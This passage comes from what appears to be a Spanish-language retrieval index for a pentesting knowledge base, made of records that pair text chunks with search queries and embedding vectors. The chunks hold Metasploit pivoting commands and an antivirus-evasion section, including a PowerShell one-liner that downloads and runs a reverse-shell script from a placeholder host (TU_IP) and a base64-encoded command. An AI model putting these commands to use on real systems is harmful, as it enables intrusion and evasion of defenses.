-0.12525, 0.03093, 0.16465, 0.05249, 0.03172, -0.06332, -0.09473, 0.04368, 0.11337, 0.07562, -0.02724, -0.08943, -0.08692, -0.05122, -0.02822, 0.12858, 0.01783, 0.03652, -0.05886, -0.02003, 0.12843, 0.13119, 0.13613, 0.03299, -0.04056, -0.0997, 0.03077, 0.08192, 0.03888, 0.08204, -0.10318, 0.02829, -0.03228, -0.08739, -0.10625, -0.19211, 0.04645, 0.00018, -0.01878, -0.01523, -0.18572, -0.07776, 0.00304, -0.05594, 0.01785, 0.03862, -0.07625, 0.09117, -0.06679, 0.02857, 0.00845, -0.10566, 0.00877, -0.06678, 0.01188, 0.04731, -0.03024, 0.01966, 0.05969, -0.00812, -0.14882, 0.08982, 0.08418, -0.02992, 0.03849, 0.06329, 0.09307, -0.12836, -0.03414, 0.01958, -0.0322, 0.07909, -0.05409, 0.03156, 0.09025, 0.00479, 0.04974, 0.11326, -0.06533, 0.10866, -0.04222, -0.01472, -0.0102, 0.11797, -0.03727, -0.0111, 0.12057, -0.03415, 0.03692, 0.0493, -0.0588, 0.02213, 0.00898, 0.05674, -0.04778, -0.03262, -0.07422, -0.03975, 0.01257, -0.04475, 0.02366, 0.08265, 0.00206, -0.05952, 0.00042, -0.0207, 0.02493, 0.09526, -0.01856, -0.02534, 0.05937, -0.05993, 0.05421, -0.02909, -0.03548, -0.00694, -0.06109, -0.0875, -0.01783, 0.08997, -0.04903, -0.03059, -0.08605, 0.02109, 0.01854, -0.02149, 0.02841, 0.09126, 0.0344, 0.03332, -0.02427, -0.03465, -0.0013, 0.05809, -0.00969, -0.03766, 0.02656, -0.11223, -0.05552, 0.05227, -0.06098, -0.02086, 0.03698, -0.03341, 0.00554, -0.00495, 0.02905, 0.05645, -0.01692, 0.01747, 0.02096, 0.00638, 0.09385, -0.02562, 0.05794, 0.03149, -0.0682, -0.00615, -0.01022, -0.05054, -0.06477, 0.01396, -0.0079, -0.04326, 0.00351, 0.03877, 0.00235, -0.04538, -0.02847, -0.03506, 0.00676, -0.00231, 0.03596, -0.02869, 0.06402, -0.00362, 0.0519, 0.04821, -0.05058, 0.00819, -0.04904, -0.03478, -0.06346, -0.02413, -0.01813, -0.04301, -0.04281, 0.03085, 0.0023, -0.05243, 0.0137, 0.04271, 0.07441, -0.03331, -0.08015, 0.10454, 0.00531, -0.02232, 0.00639, -0.00716, 0.00197, -0.00352, 0.00549, -0.04819, 0.04145, -0.00377, 0.05044, 0.06017, -0.03259, 0.00486, 0.00092, 0.07469, 0.00438, -0.0222, -0.01154, -0.02973, -0.03129, 0.01027, -0.00988, -0.01908, -0.0255, -0.00738, -0.00997, -0.03961, 0.07855, 0.00288, -0.04449, -0.01195, -0.02875, -0.01337, -0.02049, -0.02926, -0.00806, -0.02162, -0.0021, 0.00487, -0.07023, 0.01238, 0.05033]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains β†’ Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow Β· Reverse shell Β· Reglas de herramientas Β· OSCP MOC", "indexar": "cual es una alternativa libre a los comandos de Metasploit para configurar la ruta de red?", "v": [0.03666, -0.00638, -0.1071, -0.12907, 0.03769, -0.03965, -0.00947, -0.05357, -0.16559, -0.04091, -0.17221, -0.19495, 0.07518, -0.075, 0.11546, -0.01615, 0.02801, 0.03595, 0.06406, -0.1941, -0.04765, -0.18503, 0.00547, 0.00854, 0.02268, 0.08374, 0.14225, 0.03478, 0.02127, -0.03991, 0.01759, 0.02178, -0.04226, -0.03685, -0.04822, 0.05986, 0.12221, 0.02922, 0.0786, 0.03631, -0.12134, -0.02014, -0.06562, 0.11319, 0.07124, -0.13348, -0.01396, -0.08873, -0.02307, -0.05356, -0.01197, -0.08838, -0.10815, -0.01793, 0.01155, -0.04386, 0.16002, -0.09705, -0.13062, 0.01281, 0.05935, -0.02587, 0.01869, 0.11564, 0.05498, -0.03373, -0.09009, -0.10668, -0.07487, 0.07555, 0.01476, 0.04905, -0.1147, 0.04506, 0.02958, 0.06247, -0.05724, 0.00183, 0.17586, 0.06415, 0.06282, 0.05246, -0.10686, 0.05286, -0.03942, -0.09253, 0.02693, -0.08753, 0.00429, 0.06228, 0.0246, -0.04271, 0.03752, 0.0429, 0.03183, -0.02902, -0.00505, 0.0907, 0.05206, 0.05538, 0.01212, 0.07285, -0.14232, 0.1403, 0.01315, 0.02347, -0.01298, -0.03174, 0.01093, 0.0568, 0.07551, -0.04333, 0.02296, -0.03262, 0.04669, -0.08425, 0.01659, 0.00323, -0.02577, -0.00852, -0.08057, 0.00484, -0.07995, 0.03102, -0.00017, 0.07448, -0.0529, 0.01863, 0.03621, 0.03012, 0.0322, -0.02416, 0.03658, -0.12987, -0.15554, 0.0438, 0.06402, -0.0173, -0.07606, -0.08568, -0.01486, 0.05005, -0.04272, -0.02715, 0.06124, -0.00735, -0.02773, -0.07839, 0.005, 0.02075, -0.0218, 0.04531, -0.02225, 0.04749, -0.00339, 0.04305, -0.04453, 0.02787, -0.061, 0.10745, 0.01221, -0.06349, -0.03429, -0.00331, 0.02015, -0.04314, 0.01016, -0.02545, -0.05954, -0.0375, 0.01072, 0.06468, 0.04419, -0.04523, 0.01542, -0.10459, -0.01963, -0.07515, 0.06066, 0.02782, 0.0216, 0.03528, 0.02334, 0.00406, -0.00938, -0.07512, -0.00632, -0.00378, -0.00354, -0.01665, -0.04797, 0.02169, -0.03133, -0.06957, 0.02695, 0.03741, 0.04959, -0.05024, -0.09661, 0.00557, -0.04177, 0.02279, 0.01133, -0.08392, 0.0421, 0.00601, -0.03742, 0.07329, 0.04491, 0.06877, 0.06073, -0.02379, 0.09036, 0.00508, -0.07456, -0.01817, 0.04588, 0.01287, -0.0143, -0.02897, 0.05613, 0.05087, 0.0086, -0.01013, -0.02009, 0.0118, -0.02653, -0.05801, 0.00297, 0.00913, -0.00598, -0.00035, -0.02507, -0.0038, 0.01696, 0.03093, 0.02303, 0.08285, -0.01567, 0.01015, 0.02515, 0.07917, -0.03111, -0.06076, -0.04636, -0.04615, -0.10263, -0.00498, 0.01046, -0.04698, -0.0285, 0.04507, 0.01178, -0.00926, -0.04916, -0.03423]} -{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains β†’ Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow Β· Reverse shell Β· Reglas de herramientas Β· OSCP MOC", "indexar": "como monto un tunnel de tunelizacion con herramientas de pentesting?", "v": [-0.03305, -0.10217, -0.22926, -0.09329, -0.10368, 0.10017, -0.12378, 0.04438, 0.06727, 0.07746, -0.1338, 0.14302, 0.11521, 0.1098, -0.02672, 0.0085, 0.00699, -0.1125, 0.21187, -0.06223, -0.16915, -0.07497, -0.06845, -0.00856, 0.01023, -0.01414, -0.0094, -0.02824, -0.11174, -0.08762, 0.06226, -0.09427, 0.1168, -0.00387, -0.00322, -0.14989, -0.00677, 0.15777, 0.00385, -0.00131, -0.06517, -0.08826, -0.12413, 0.07035, 0.01093, -0.078, 0.01986, -0.00475, -0.03776, -0.02939, -0.06062, -0.07136, -0.1006, -0.06882, 0.10363, -0.10732, 0.08015, -0.02515, 0.10102, -0.02011, 0.01929, -0.03667, -0.05845, 0.02183, -0.01739, 0.00166, -0.01355, -0.11027, -0.1379, 0.0653, -0.04313, -0.0044, -0.00094, 0.17107, 0.00479, -0.01596, -0.00902, -0.03727, -0.01684, 0.01159, -0.03089, 0.07248, 0.01978, 0.09614, -0.00923, -0.01979, -0.0423, -0.06718, 0.03706, -0.02415, -0.1861, 0.00649, 0.05411, 0.0346, 0.07157, 0.00164, -0.00902, 0.04539, -0.01273, -0.086, 0.00405, 0.01836, -0.04231, 0.10817, 0.04847, 0.06232, -0.014, -0.00119, 0.02965, 0.00374, 0.06066, 0.14685, 0.01593, -0.05061, -0.07764, -0.0321, -0.02958, -0.093, -0.03555, -0.12078, 0.05048, 0.02842, -0.04462, 0.02002, -0.0243, -0.08455, 0.03919, 0.05434, 0.02637, 0.03785, 0.07434, 0.07467, -0.0288, -0.07403, -0.02122, 0.02671, 0.02192, -0.04722, -0.03252, -0.00014, -0.02137, -0.00254, -0.04534, -0.07893, 0.0486, -0.01311, -0.07008, -0.09229, 0.02052, -0.04801, -0.01077, 0.00433, -0.00766, -0.01423, 0.01463, -0.04052, -0.03789, 0.09028, -0.04487, 0.1109, -0.03887, -0.02817, 0.03346, -0.04775, -0.02589, -0.01358, -0.03275, -0.03487, 0.00781, -0.04885, 0.04989, 0.02414, -0.03806, 0.01853, 0.04195, -0.01185, -0.05781, -0.03145, -0.01524, 0.01008, 0.00598, -0.11381, -0.00605, 0.02446, -0.00201, -0.11336, 0.05213, -0.03454, 0.07626, 0.08129, -0.05891, -0.02037, -0.05133, -0.01152, -0.03762, -0.01994, 0.04329, -0.04457, 0.03676, -0.0276, -0.03854, 0.02017, 0.02495, -0.07078, -0.03556, 0.03155, -0.0315, -0.04139, 0.01853, 0.08125, 0.09212, -0.05121, 0.01902, -0.03892, 0.0761, 0.03939, 0.0527, 0.07907, -0.03622, 0.01041, 0.00048, 0.05837, 0.04341, 0.01064, -0.05601, 0.01511, -0.04736, 0.03563, -0.08563, 0.01007, 0.03362, 0.02397, -0.06801, 0.01804, 0.00758, -0.03845, 0.00694, 0.0564, -0.01489, -0.00368, 0.01014, 0.00958, 0.02937, 0.00826, -0.07348, 0.05368, 0.05335, -0.01715, -0.03972, -0.05657, -0.00771, 0.00037, -0.03419, -0.02952, 0.04271, -0.00888]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "indexar": "que programa sirve para esquivar el antivirus tocando disco?", "v": [-0.01425, -0.12162, -0.19357, -0.0731, -0.07102, -0.11546, -0.08889, -0.11427, -0.00468, -0.04102, 0.08669, -0.15494, -0.12206, -0.04363, 0.07615, -0.09363, 0.16889, 0.01113, 0.11325, 0.16792, -0.01914, -0.08508, -0.06127, -0.03925, 0.10877, 0.01153, -0.07945, 0.06152, -0.09816, 0.08707, -0.03298, 0.04945, -0.02343, -0.11091, 0.04886, -0.05459, 0.01044, -0.03349, 0.11126, 0.06275, 0.08795, -0.05868, -0.05593, -0.03992, 0.01875, -0.06823, 0.14149, -0.02436, 0.11249, 0.03049, 0.01005, 0.03157, 0.03626, -0.0573, -0.00284, -0.16819, -0.02566, -0.12018, 0.04346, 0.0653, -0.04941, -0.02102, -0.0256, 0.06552, 0.06271, -0.0389, 0.01549, -0.13155, -0.03306, 0.05918, -0.15964, 0.07401, 0.13619, -0.08932, -0.04839, -0.0564, 0.01483, 0.01939, 0.03547, -0.06886, -0.03712, -0.01757, 0.06318, 0.07855, -0.13268, -0.05491, 0.03065, 0.00209, 0.02371, 0.01788, -0.0629, 0.05818, -0.02481, 0.06383, 0.08533, -0.06051, 0.1227, 0.10399, 0.0233, 0.00428, 0.07277, -0.007, -0.11827, 0.02498, -0.01925, -0.01297, 0.08471, -0.05861, -0.08134, 0.14008, 0.00438, 0.00781, -0.03663, -0.0539, -0.08174, -0.02121, 0.02543, -0.05073, 0.08687, 0.09076, -0.03747, 0.05302, -0.1204, 0.00264, 0.08598, -0.03667, 0.00946, 0.07744, -0.10012, 0.08609, 0.04057, -0.04008, -0.03327, 0.03853, -0.07449, -0.01027, -0.01876, -0.02079, 0.0309, 0.02318, 0.13702, 0.14716, 0.00692, 0.04282, 0.03027, 0.00829, 0.06098, -0.00252, -0.00652, 0.0299, 0.02606, 0.07072, -0.06169, 0.04709, -0.04282, 0.03437, 0.03616, -0.04617, -0.04222, 0.00798, 0.0497, -0.00192, -0.01409, 0.0082, 0.01837, -0.04844, 0.04033, -0.01159, 0.06374, 0.11526, -0.03243, 0.02962, 0.05393, -0.06214, -0.0469, -0.05918, -0.00741, -0.05002, 0.05934, -0.02511, -0.00606, -0.00442, 0.01946, -0.05538, -0.01255, -0.00261, -0.01005, 0.03443, -0.01385, -0.02265, -0.0158, -0.05116, -0.05359, -0.00374, 0.024, -0.07879, -0.03526, -0.02282, -0.02889, -0.00396, -0.01776, -0.05663, -0.05985, -0.03564, 0.06837, 0.04784, 0.00678, -0.02152, 0.06248, 0.07146, 0.02531, -0.01614, -0.02047, 0.05627, 0.00224, -0.07206, 0.01676, 0.09086, 0.05277, 0.0741, -0.00709, -0.00689, 0.06803, -0.03735, -0.0255, -0.01132, 0.00751, 0.01099, 0.09165, 0.00541, -0.01331, -0.03229, 0.00362, 0.00157, 0.00217, -0.00038, -0.03108, -0.0034, -0.02758, -0.03982, -0.04009, 0.01533, -0.01953, -0.09017, -0.02716, -0.02498, 0.00845, 0.03349, -0.00028, -0.01465, -0.03235, 0.02495, -0.03736, -0.01457, 0.03406, 0.04567]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "indexar": "como puedo montar un payload que sobreviva si hay antivirus instalado?", "v": [0.09384, 0.12042, -0.2272, -0.09592, -0.12407, 0.06228, 0.05812, -0.03679, -0.1586, -0.06649, 0.03335, -0.09407, 0.00779, 0.10032, 0.04466, 0.07455, 0.00164, -0.11568, 0.02174, 0.08047, -0.02136, -0.07769, -0.03624, -0.017, 0.05189, 0.23491, -0.06084, -0.00057, -0.19493, -0.04979, 0.04739, 0.14023, -0.00289, 0.0586, -0.09813, -0.02066, -0.02656, 0.00314, 0.04362, 0.03806, 0.06122, -0.00967, -0.01564, 0.06068, 0.0219, -0.00321, 0.06494, -0.12233, 0.08336, -0.07562, 0.05095, 0.02324, -0.02717, -0.01563, -0.03171, -0.10809, 0.08348, -0.08496, 0.13504, -0.03061, -0.08363, 0.19162, -0.05751, 0.07662, 0.01711, -0.03057, -0.02186, 0.00378, -0.0999, -0.05975, -0.02862, -0.01739, -0.02168, 0.01769, -0.03915, 0.00756, -0.04165, 0.01828, 0.08773, 0.08467, 0.06339, 0.00566, 0.02576, 0.00656, -0.10107, -0.06098, 0.01272, -0.03213, 0.02829, -0.05943, 0.01906, 0.04209, -0.06929, 0.11539, -0.03338, -0.06562, 0.10702, 0.08073, 0.04093, 0.00946, -0.00644, 0.03433, 0.04973, 0.10174, 0.05378, -0.03715, 0.04489, -0.14005, 0.02949, -0.06848, 0.05133, -0.00778, 0.01498, -0.01141, -0.0606, -0.14853, 0.03629, 0.02641, 0.02934, -0.02566, -0.06628, 0.01372, -0.02619, 0.07418, 0.05636, -0.10761, 0.00696, 0.17216, -0.03622, 0.04536, -0.00752, -0.04169, 0.01267, -0.01222, -0.07213, 0.04451, 0.05574, -0.07783, -0.05025, 0.02166, 0.0701, 0.06599, 0.04497, 0.04021, 0.03944, 0.09127, -0.0291, -0.08999, -0.04932, 0.00542, 0.08893, 0.0884, 0.00461, 0.03895, -0.0281, 0.01713, 0.09724, -0.01289, 0.08219, 0.05613, -0.00407, 0.06927, 0.00483, 0.01116, -0.00471, 0.00207, -0.04791, -0.04742, 0.05596, 0.09738, -0.00616, 0.04398, 0.01651, -0.06294, 0.01767, -0.03449, -0.00773, -0.04317, 0.06683, -0.00271, -0.08611, 0.02267, 0.02017, 0.03139, -0.04175, -0.02898, -0.012, 0.01694, 0.01631, 0.02198, 0.04362, 0.02708, -0.04378, -0.00195, 0.00393, -0.07546, -0.07523, -0.03199, 0.06083, 0.02927, -0.01096, -0.02676, -0.07645, -0.04786, 0.0297, 0.02952, -0.02792, 0.04641, 0.03632, 0.04521, 0.09923, -0.0424, 0.03058, -0.03827, -0.03656, -0.01965, 0.02884, -0.03404, -0.00617, 0.0316, 0.00983, 0.04697, 0.07595, -0.07505, -0.04304, 0.00906, 0.01887, 0.04108, 0.08869, 0.01275, -0.00374, 0.03103, -0.00486, -0.0513, 0.05025, 0.03217, 0.00471, -0.00527, -0.05529, 0.01358, -0.00668, 0.0263, 0.01645, -0.12983, -0.07913, -0.06392, -0.03447, 0.0485, 0.00536, -0.05477, -0.04082, 0.08157, 0.0035, 0.00061, 0.01229, -0.0129]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# AV evasion\n\n> Cuando hay antivirus y tu payload muere al tocar disco. Fuente: oscp.trastero.org/avevasion.", "indexar": "cual es una tecnica para evitar que el antivirus detecte mi archivo al abrirlo?", "v": [-0.01536, -0.04287, -0.12231, -0.16717, -0.00719, -0.02992, -0.03367, 0.00755, -0.14998, -0.01778, -0.05541, -0.13941, -0.12275, 0.06223, 0.19984, -0.06048, 0.13421, -0.07259, 0.16189, 0.06326, -0.0278, -0.03035, -0.06387, -0.00051, -0.00172, -0.04245, -0.0579, 0.04626, -0.13132, -0.07319, -0.0875, 0.05812, 0.05086, 0.09057, -0.01238, 0.08781, 0.04532, -0.0212, -0.03677, 0.06679, 0.04421, -0.03203, -0.12617, 0.09426, 0.02503, -0.11063, 0.04151, -0.00111, 0.06748, 0.06038, -0.02455, 0.02061, -0.00277, -0.04845, -0.04752, -0.05188, 0.02067, -0.03322, 0.1143, -0.03689, -0.06349, 0.08322, 0.00117, 0.05862, -0.03621, -0.17489, 0.02773, 0.00262, -0.11388, 0.03786, -0.11847, 0.099, 0.01382, 0.09244, -0.08055, -0.0182, -0.11113, -0.04507, 0.05571, 0.01238, 0.02189, 0.03911, 0.08955, -0.00874, -0.10439, -0.14304, -0.0307, 0.04673, -0.0203, -0.14658, 0.0552, 0.04294, -0.06427, 0.07207, 0.05903, -0.07855, 0.08037, 0.03661, -0.08157, 0.04463, 0.0271, -0.0649, -0.1199, 0.16169, 0.05761, -0.0624, -0.06494, -0.01557, -0.06564, -0.0192, 0.0253, -0.00837, 0.03139, 0.05093, -0.03506, -0.05816, 0.01336, -0.06004, -0.00509, -0.03088, -0.05813, -0.0185, -0.08972, 0.05232, 0.00108, -0.11331, -0.03848, 0.09597, -0.06491, 0.01685, -0.03893, -0.04667, -0.11356, -0.0426, -0.09254, 0.05548, 0.03997, -0.06143, -0.1323, 0.00861, 0.06829, 0.03975, -0.01511, 0.03418, 0.05822, -0.02366, -0.04463, -0.0097, -0.14915, -0.05131, 0.01453, -0.00457, 0.00947, 0.0204, -0.02178, 0.08997, 0.06586, -0.07732, 0.034, 0.00048, 0.02261, 0.10135, 0.03101, -0.0463, -0.01095, -0.01587, -0.00327, -0.03048, 0.02144, -0.06302, -0.00422, 0.01629, -0.05347, -0.0827, -0.05591, -0.00803, -0.01081, -0.12268, 0.0232, -0.08857, -0.0169, -0.00182, 0.04246, 0.00972, -0.00186, -0.04836, 0.04902, -0.02603, -0.04087, 0.0158, -0.02415, -0.00304, -0.07244, 0.04528, -0.00852, -0.07853, 0.01332, -0.06255, 0.0151, 0.07774, -0.02311, -0.07163, -0.10088, -0.03064, 0.01729, -0.03545, -0.03668, -0.05344, -0.01726, -0.03123, 0.07298, -0.00976, 0.03428, -0.03388, -0.02518, -0.00115, -0.02745, 0.029, -0.00236, -0.02614, 0.02229, 0.02462, 0.07603, -0.03406, -0.03342, -0.02369, -0.03367, 0.02104, 0.07624, -0.0605, -0.00581, 0.03244, 0.00652, -0.00567, 0.01154, -0.01279, -0.01233, -0.03933, 0.00282, -0.01798, 0.01737, 0.06328, 0.04057, -0.11249, -0.03369, 0.01139, -0.05454, 0.02893, -0.0153, -0.06396, -0.04776, -0.00597, 0.04931, -0.0231, 0.06277, -0.03205]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "que programa sirve para ejecutar comandos sin tocar disco", "v": [0.07279, -0.01923, -0.25639, -0.07853, 0.04922, -0.14467, 0.0633, 0.02959, -0.00532, -0.03996, -0.00413, -0.03609, 0.0334, -0.12851, 0.03987, -0.02696, 0.18504, -0.01773, 0.02425, 0.00539, 0.04649, -0.07869, 0.05097, -0.03059, 0.07707, -0.038, 0.00568, -0.00364, -0.11495, -0.0163, 0.00472, -0.02979, 0.08063, -0.18185, 0.06494, -0.09531, -0.00223, -0.09643, 0.071, 0.16446, -0.05993, 0.06274, -0.13765, 0.02771, -0.00345, -0.06149, 0.1526, 0.02245, 0.06616, -0.04598, 0.09055, 0.05449, -0.05748, -0.04064, -0.03829, -0.11678, 0.03027, -0.09013, -0.00514, 0.10981, -0.02745, -0.08348, 0.06807, 0.0632, 0.1104, 0.01536, 0.07441, -0.14299, 0.04246, 0.11223, -0.1602, 0.10481, 0.06057, 0.04128, 0.03165, -0.06453, 0.00472, -0.05986, 0.07114, -0.08279, -0.01032, -0.01378, -0.05247, 0.07283, -0.14091, -0.02258, 0.01092, -0.0172, -0.02681, -0.01891, 0.04038, 0.01344, -0.04134, 0.06811, 0.13818, 0.03505, 0.10939, 0.08787, 0.06443, 0.02313, 0.12077, -0.03986, -0.10158, 0.02646, 0.04956, 0.08839, 0.08997, -0.05947, 0.02981, 0.13005, 0.00528, -0.00897, 0.00214, -0.08434, -0.04426, -0.04197, -0.02394, -0.04137, -0.00088, 0.01819, -0.10784, 0.07738, -0.01619, 0.03759, 0.03322, 0.01422, -0.01328, 0.03681, -0.01088, 0.08009, 0.03513, -0.01999, 0.10496, -0.02054, -0.0146, 0.04908, -0.00283, -0.0054, -0.04182, -0.10586, 0.11992, 0.12683, -0.01936, 0.04398, 0.05384, 0.01678, 0.06122, 0.00672, -0.00205, 0.02476, 0.04679, 0.06009, -0.07296, 0.05008, -0.06545, -0.06139, 0.01409, 0.01725, -0.05371, 0.00608, 0.00878, 0.00164, -0.06559, -0.02827, 0.01202, -0.00182, 0.00958, -0.01076, 0.07034, 0.09483, -0.05942, 0.03955, 0.06906, -0.02238, -0.01482, -0.07611, -0.02619, -0.03587, 0.09701, 0.03887, -0.0359, 0.03607, -0.02573, -0.05085, -0.01383, -0.02906, -0.04308, 0.01618, -0.03167, -0.00596, 0.03259, 0.0317, -0.02232, -0.03935, 0.01358, -0.02448, 0.01459, 0.01533, -0.0871, -0.00623, -0.06189, -0.02663, 0.00587, -0.03608, 0.08125, 0.07646, -0.02192, 0.0483, 0.02079, 0.04652, -0.00183, -0.02229, 0.03237, 0.05637, -0.00512, -0.06064, 0.01199, 0.08233, 0.01587, 0.07678, -0.04295, 0.019, 0.10032, -0.03107, -0.00432, -0.02912, 0.01147, -0.01887, 0.09338, 0.02971, 0.01219, -0.01292, -0.00785, 0.00672, 0.01055, -0.00145, -0.02223, -0.01244, -0.02758, -0.07374, -0.02022, 0.03939, -0.00345, -0.10512, 0.00219, -0.04168, -0.07327, -0.00782, -0.02881, 0.00258, -0.01018, 0.03894, 0.02732, -0.04339, 0.01129, 0.04819]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "con que puedo correr un script de PowerShell desde la memoria sin guardar archivos", "v": [-0.08388, -0.04448, -0.02054, -0.21064, -0.17516, -0.08303, -0.0332, 0.06605, 0.03043, -0.11488, -0.12718, 0.02529, 0.05557, -0.00532, 0.06808, 0.03899, 0.08672, 0.09158, -0.02565, 0.0318, -0.04527, 0.0056, -0.00439, -0.05566, -0.01503, 0.0523, 0.03202, 0.17296, -0.12518, -0.06048, -0.07573, 0.11617, 0.19624, -0.07739, -0.05567, 0.07593, 0.01836, 0.10861, 0.02705, 0.0731, -0.11386, 0.14345, -0.02707, 0.12942, 0.01334, -0.07697, 0.04222, -0.03201, 0.08569, -0.13403, 0.00836, -0.00938, 0.02641, -0.01139, 0.00244, 0.03039, -0.06859, -0.02438, -0.02049, -0.02062, -0.04658, 0.07719, -0.05048, 0.11537, 0.03194, 0.05721, -0.07258, -0.06608, -0.19723, 0.04673, -0.09346, 0.02386, -0.11141, 0.04613, -0.01297, -0.01603, 0.04996, -0.01227, -0.01401, 0.08601, -0.09232, -0.11926, -0.01672, 0.02084, -0.00377, -0.04065, -0.05926, 0.02501, 0.06792, 0.01148, 0.06882, 0.00237, -0.08196, 0.09127, -0.01255, -0.01267, 0.11205, 0.12068, -0.00914, 0.05394, -0.08114, 0.00346, -0.03703, 0.07535, 0.12374, 0.03384, 0.03869, 0.07117, 0.05572, -0.05112, -0.0114, -0.03394, -0.04977, 0.05212, -0.06054, 0.05675, 0.01324, -0.07084, -0.03664, 0.03103, -0.01481, -0.01975, -0.0649, -0.00943, 0.02024, -0.04106, 0.05272, 0.01092, -0.03627, 0.07238, 0.0061, 0.10996, -0.03669, -0.13322, -0.07674, 0.06951, -0.0621, 0.13443, 0.00862, -0.04515, 0.0924, -0.01365, -0.02391, 0.04207, -0.08007, -0.00198, -0.0289, 0.06849, -0.05366, -0.03066, 0.01432, -0.02384, 0.01256, -0.00198, -0.00808, -0.01669, 0.04444, -0.12718, -0.08659, -0.02933, -0.13757, 0.09597, -0.03761, 0.01452, -0.03305, -0.08587, -0.0036, 0.00916, 0.03031, 0.02548, 0.02044, -0.01326, -0.01278, -0.03341, 0.03015, -0.05457, -0.0107, -0.04103, 0.04107, -0.02759, -0.0315, -0.0075, -0.01207, 0.06944, -0.05495, -0.06172, 0.06857, 0.00171, 0.00618, 0.02424, 0.03108, 0.01856, 0.0733, -0.089, 0.01587, -0.06507, -0.02712, 0.04145, 0.04647, 0.03838, -0.15346, 0.04142, -0.04486, 0.06824, 0.07334, 0.02495, -0.04636, 0.03617, -0.01561, -0.068, 0.05815, -0.02072, 0.04222, -0.00978, -0.03911, -0.00021, 0.04532, 0.02358, -0.03511, -0.05909, 0.03405, 0.04776, 6e-05, 0.04643, -0.02482, -0.0182, 0.01933, -0.00035, -0.0098, -0.03486, -0.03797, 0.04059, -0.05898, 0.04564, 0.04708, 0.00179, -0.06325, -0.02862, -0.01105, 0.01894, -0.06021, 0.05337, -0.05714, -0.00295, -0.09554, 0.02808, -0.02106, 0.03285, -0.02425, -0.04403, 0.02678, 0.00646, -0.02648, 0.02048, 0.01968, -0.01912]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## PowerShell en memoria (no toca disco)\n```powershell\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/rev.ps1') # fileless\npowershell -ExecutionPolicy Bypass -File evasion.ps1\npowershell -encodedCommand JABjAG8AZABl... # comando en base64 (UTF-16LE)\n```", "indexar": "cual es una alternativa libre a los scripts de PowerShell en base64", "v": [0.07033, -0.03731, -0.10499, -0.04262, -0.11464, -0.1905, -0.07663, -0.16652, 0.02712, -0.06375, -0.07209, 0.00969, -0.05211, -0.06184, 0.01705, -0.00347, -0.02024, -0.13466, -0.05447, -0.05735, -0.08139, -0.031, -0.08423, -0.08076, -0.04281, -0.00211, -0.05838, -0.0297, -0.15636, -0.0282, 0.03852, -0.00826, -0.04075, -0.02955, -0.0999, 0.0028, -0.05323, 0.08891, 0.06821, 0.07982, -0.00634, 0.04225, -0.14417, 0.22271, -0.04644, -0.0736, 0.01727, -0.00923, 0.09766, -0.08018, -0.05481, -0.12181, -0.16994, -0.01289, 0.01413, -0.14084, 0.05967, -0.12844, -0.07267, 0.06346, -0.08682, 0.02436, 0.09352, -0.01292, 0.01587, 0.00283, -0.00512, -0.05365, -0.0953, 0.07601, -0.06037, 0.07708, -0.12442, -0.01893, 0.01388, 0.07678, 0.00971, -0.07658, -0.04336, 0.05763, -0.06083, -0.00982, -0.03048, 0.02965, -0.05876, -0.06421, 0.00385, -0.11274, -0.05718, -0.00961, 0.19762, 0.03527, -0.01932, 0.10799, 0.00151, -0.07791, 0.03634, 0.05563, 0.0272, 0.03538, -0.03879, -0.09889, -0.04449, -0.02775, 0.10939, -9e-05, 0.11266, -0.01905, -0.07727, 0.03645, -0.04865, 0.12861, 0.04957, 0.06102, 0.0587, -0.05601, -0.05554, 0.02343, 0.05537, -0.05716, -0.02598, 0.04957, -0.0555, -0.03359, 0.07665, 0.02594, 0.04536, -0.0264, -0.02531, 0.01753, -0.02334, -0.02958, -0.05798, -0.00601, 